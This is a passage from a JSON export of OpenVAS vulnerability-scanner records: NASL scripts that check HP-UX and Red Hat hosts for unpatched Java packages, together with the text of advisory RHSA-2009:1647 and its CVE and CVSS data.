!= NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-COM\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF32\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF64\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20W\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-COM\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-COM\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF32\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF64\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA11\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20W\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-COM\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20W\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-COM\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF32\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF64\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-COM\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-COM\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF32\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF64\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20W\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-COM\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-COM\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF32\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF64\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA11\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20W\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-COM\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20W\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-COM\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF32\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF64\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-COM\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-COM\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF32\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF64\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20W\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:40:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:1647.\n\nThe IBM 1.5.0 Java release includes the IBM Java 2 Runtime Environment and\nthe IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM Security alerts page listed in\nthe References section. (CVE-2009-3867, CVE-2009-3868, CVE-2009-3869,\nCVE-2009-3871, CVE-2009-3872, CVE-2009-3873, CVE-2009-3874, CVE-2009-3875,\nCVE-2009-3876, CVE-2009-3877)\n\nAll users of java-1.5.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.5.0 SR11 Java release. All running instances\nof IBM Java must be restarted for this update to take effect.", "modified": "2018-04-06T00:00:00", "published": "2009-12-14T00:00:00", "id": "OPENVAS:136141256231066471", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066471", "type": "openvas", "title": "RedHat Security Advisory RHSA-2009:1647", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_1647.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:1647 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:1647.\n\nThe IBM 1.5.0 Java release includes the IBM Java 2 Runtime Environment and\nthe IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM Security alerts page listed in\nthe References section. (CVE-2009-3867, CVE-2009-3868, CVE-2009-3869,\nCVE-2009-3871, CVE-2009-3872, CVE-2009-3873, CVE-2009-3874, CVE-2009-3875,\nCVE-2009-3876, CVE-2009-3877)\n\nAll users of java-1.5.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.5.0 SR11 Java release. All running instances\nof IBM Java must be restarted for this update to take effect.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66471\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-14 23:06:43 +0100 (Mon, 14 Dec 2009)\");\n script_cve_id(\"CVE-2009-3867\", \"CVE-2009-3868\", \"CVE-2009-3869\", \"CVE-2009-3871\", \"CVE-2009-3872\", \"CVE-2009-3873\", \"CVE-2009-3874\", \"CVE-2009-3875\", \"CVE-2009-3876\", \"CVE-2009-3877\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Security Advisory RHSA-2009:1647\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-1647.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#critical\");\n script_xref(name : \"URL\" , value : \"http://www.ibm.com/developerworks/java/jdk/alerts/\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm\", rpm:\"java-1.5.0-ibm~1.5.0.11~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-demo\", rpm:\"java-1.5.0-ibm-demo~1.5.0.11~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-devel\", rpm:\"java-1.5.0-ibm-devel~1.5.0.11~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-javacomm\", rpm:\"java-1.5.0-ibm-javacomm~1.5.0.11~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-jdbc\", rpm:\"java-1.5.0-ibm-jdbc~1.5.0.11~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-plugin\", rpm:\"java-1.5.0-ibm-plugin~1.5.0.11~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-src\", rpm:\"java-1.5.0-ibm-src~1.5.0.11~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm\", rpm:\"java-1.5.0-ibm~1.5.0.11~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-accessibility\", rpm:\"java-1.5.0-ibm-accessibility~1.5.0.11~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-demo\", rpm:\"java-1.5.0-ibm-demo~1.5.0.11~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-devel\", rpm:\"java-1.5.0-ibm-devel~1.5.0.11~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-javacomm\", rpm:\"java-1.5.0-ibm-javacomm~1.5.0.11~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-jdbc\", rpm:\"java-1.5.0-ibm-jdbc~1.5.0.11~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-plugin\", rpm:\"java-1.5.0-ibm-plugin~1.5.0.11~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-src\", rpm:\"java-1.5.0-ibm-src~1.5.0.11~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 